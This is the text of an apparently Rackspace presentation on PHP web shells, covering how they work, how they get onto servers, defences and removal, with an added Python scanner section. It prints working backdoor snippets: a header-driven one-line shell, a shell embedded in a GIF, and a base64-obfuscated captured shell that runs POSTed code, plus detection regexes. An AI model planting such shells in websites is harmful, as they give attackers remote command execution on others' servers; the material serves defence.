Page 1: An introduction to php shells

An introduction to PHP shells

Richard Mahoney, Developer Support Engineer

Created by: Richard Mahoney

Modified Date:09/05/2013

Classification: Public

Page 2: An introduction to php shells

RACKSPACE® HOSTING | WWW.RACKSPACE.COM

About Me

• PHP developer before becoming a Linux SysAdmin 6 years ago
• Joined Rackspace in 2013
• Several years of experience with web app security
• Is a Certified Ethical Hacker


Page 3: An introduction to php shells


About this presentation

• What PHP shells are and why they exist
• Where they come from
• How to defend against the threat
• Removal
• Q & A


Page 4: An introduction to php shells


So, what is a PHP shell?

Page 5: An introduction to php shells


What is a PHP shell?

• A malicious file containing PHP functions such as eval() and shell_exec()
• Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE
• Usually obfuscated: eval(base64_decode('JF9HRVRbY10='));
• Used to run arbitrary commands supplied by the attacker
• The most common variant is the C99 shell


Page 6: An introduction to php shells


How much of a threat?

• Worst case: root compromise via a kernel exploit or simply by looking through files for passwords
• But that's not really needed...
• As the Apache user it can:
  • Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining
  • Steal data by using MySQL credentials found in PHP files
  • Host illegal material
  • Send out huge amounts of spam (very common)
  • Be used as a proxy for launching attacks on other servers, including those behind the same firewall


Page 7: An introduction to php shells


Here’s what one looks like


Page 8: An introduction to php shells


How did it get onto my server?

Page 9: An introduction to php shells


Where did it come from?

• The vast majority are via vulnerable third-party plugins for WordPress, Joomla etc.
• Automated bots scan for the presence of these plugins and notify the attacker
• The attacker then uploads the malicious code, typically to an /uploads or /media directory, by exploiting the vulnerable website
• The attacker visits the malicious shell script via a browser or by using a tool such as cURL
• All of these steps could be scripted to continually compromise hosts and build a botnet
• But, don't forget (S)FTP or your own code as an attack vector


Page 10: An introduction to php shells


Defending against the threat

Page 11: An introduction to php shells


The golden rule

• Never trust user input
• Validate and sanitise as appropriate
• The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe
• Use PHP functions such as filter_var()
• Strip null bytes from filenames by using trim()
• Check the contents of any file uploaded to the server. Do not rely on file extensions
• Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF:

GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^BD^A???;???
<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...


Page 12: An introduction to php shells


Another example

• Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard WordPress install due to its use in JavaScript libraries:

root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l
33

• But it's easy for an attacker to evade scans. This is a fully working PHP shell:

<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>

Where the HTTP header A is set to the string "eval", and B can be any PHP function.
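As an added example that is not part of the slides, a small Python 3.9+ triage script that looks for the indicators discussed on slides 5, 11 and 12 (a PHP open tag behind an image header, eval() wrapped around a decoder, and a superglobal used as the function name) and peels off constant base64 layers so that the hidden eval() of request data from slides 15 and 16 becomes visible, while leaving the bare eval( in JavaScript libraries alone. The sample files are constructed to mirror the shells shown in the deck (not real captured files), and the regular expressions are heuristics, not a complete signature set.

```python
import base64
import re

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?php|<\?=")
# eval() fed by a decoder is rarely legitimate; bare eval( in JS libraries is noise (slide 12).
EVAL_DECODER = re.compile(rb"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(")
# A superglobal element used as a variable function name, e.g. $_SERVER['HTTP_A'](...)
SUPERGLOBAL_CALL = re.compile(rb"\$_(?:GET|POST|COOKIE|REQUEST|SERVER|ENV)\s*\[[^\]]*\]\s*\(")
EVAL_OF_INPUT = re.compile(rb"eval\s*\(.*\$_(?:GET|POST|COOKIE|REQUEST|SERVER)")
# Constant base64 literal passed to base64_decode(), so the obfuscation layer can be peeled.
B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def peel_base64(data: bytes, depth: int = 3) -> list[bytes]:
    """Decode every constant base64 layer in data, recursing up to depth levels."""
    layers = []
    for m in B64_LITERAL.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # truncated or non-base64 literal: nothing to peel
            continue
        layers.append(decoded)
        if depth > 1:
            layers.extend(peel_base64(decoded, depth - 1))
    return layers

def scan(data: bytes) -> list[str]:
    """Return sorted indicator labels for one file's bytes; [] means nothing suspicious."""
    findings = set()
    if data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data):
        findings.add("php-in-image")  # image header with a PHP tag behind it (slide 11)
    hidden = peel_base64(data)
    for layer in [data] + hidden:
        if EVAL_DECODER.search(layer):
            findings.add("eval-decoder")
        if SUPERGLOBAL_CALL.search(layer):
            findings.add("superglobal-call")
    if any(EVAL_OF_INPUT.search(layer) for layer in hidden):
        findings.add("hidden-eval-of-input")  # only visible once decoded, as on slides 15/16
    return sorted(findings)

# Constructed samples modelled on the deck's examples (not real captured files).
SAMPLES = {
    "uploads/avatar.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
    b"<?php $lol = $_GET['lol']; if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb'))); }",
    "images/a.php": b"<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>",
    "images/404.php": b"<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP"
    b"U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNlNzIzMzY1NjA2MzY4Jzs=')); ?>",
    "wp-includes/js/lib.js": b"var obj = eval('(' + json + ')');",  # legitimate JS eval: no finding
}
```

Run scan() over the bytes of each file under the web root; on the sample dictionary the three shells are flagged while the JavaScript eval( that inflates the grep count is not.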


Page 13: An introduction to php shells


What else can I do?

• Create a .htaccess file in any directories which shouldn't contain PHP code
• In the contents:

php_flag engine off

• Ensure SFTP/FTP passwords are strong
• Apache log files should be owned by root to prevent LFI (local file inclusion) attacks
• Never run Apache as root
• Install anti-virus software and set it to scan on write


Page 14: An introduction to php shells


Removal

Page 15: An introduction to php shells


Example of a compromised server

This /images directory contains 3 PHP shells:

[root@web1 images]# ls -l *.php

-rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php

-rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php

-rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php

The contents:

<?php
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNlNzIzMzY1NjA2MzY4Jzs=')); ?>


Page 16: An introduction to php shells


Example of a compromised server

Which evaluates to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368';

To make these safe, move them to somewhere like "/root/compromised_files" if you want to investigate further, or just delete them. If you can't/don't want to move the files, chmod to 000 and set the owner to root to disable access:

[root@web1 images]# ls -l *.php

---------- 1 root root 123617 Jun 19 16:09 404.php

---------- 1 root root 11684 Jun 19 17:34 mlr2.php

---------- 1 root root 24364 Jun 30 17:43 wso.php


Page 17: An introduction to php shells


Next steps

• Check for unusual files in places such as /tmp and /var/cache
• Use "ls -la" to show hidden directories
• Study the output of "lsof"
• If malicious files owned by root are found, wipe the server and reinstall
• Update all software on the server, including any CMS add-ons/plugins
• Perform a virus scan


Page 18: An introduction to php shells


Any Questions?

Page 19: An introduction to php shells


Further reading

The Open Web Application Security Project (OWASP) Top 10: owasp.org

The PHP Security Guide: phpsec.org

/r/Netsec: reddit.com/r/netsec


Page 20: An introduction to php shells

RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218

US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM

RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM

RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ

UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK